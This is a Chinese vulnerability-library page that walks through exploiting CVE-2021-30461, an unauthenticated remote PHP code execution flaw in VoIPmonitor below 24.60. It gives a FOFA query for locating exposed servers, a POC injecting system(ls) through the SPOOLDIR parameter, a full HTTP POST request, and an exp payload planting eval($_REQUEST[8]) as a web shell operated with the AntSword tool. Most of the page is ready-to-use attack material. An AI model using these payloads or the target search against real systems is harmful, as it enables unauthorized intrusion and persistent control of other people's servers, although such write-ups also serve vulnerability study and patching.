VoIPmonitor 远程命令执行(CVE-2021-30461)–kanjin-漏洞文库小世界-安全文库-NGC660 安全实验室

VoIPmonitor 远程命令执行(CVE-2021-30461)–kanjin

漏洞详情

VoIPmonitor Web允许未经身份验证的远程用户触发VoIPmonitor中的远程PHP代码执行漏洞 。

fofa语法

title=“VoIPmonitor”

影响版本

VoIPmonitor < 24.60

POC

SPOOLDIR=test”.system(ls).“&recheck=annen

漏洞复现

首先你可以访问到这个界面
1625708411089-4bb47ce7-ec2a-4b5f-8da8-b30985f7dd9b

然后通过漏洞POC查看是否有漏洞。下图为存在漏洞的情况:
1625708444401-4b6aac97-3607-40ee-8535-e7bc5167728d

请求包如下:
POST / HTTP/1.1Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept-Encoding: gzip, deflate
Accept: /
Connection: close
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 49

SPOOLDIR=test”.system(ls).“&recheck=annen

exp

修改poc为:SPOOLDIR=test”.eval($_REQUEST[8]).“&recheck=annen
配置蚁剑如下:
设置连接密码为8(可自由设置)。
1625708561925-c72368f7-2ddf-4301-b2bc-c811f43061f3

配置body信息如下:
1625708595544-92fd2daa-3a57-4611-a70c-83994f9ce4ff

测试连接成功如下。
1625708628045-fd3386f9-ec1c-461d-af8d-6229f954411f

结束。

参考链接

https://blog.csdn.net/qq_37602797/article/details/116612199

请登录后发表评论

    请登录后查看回复内容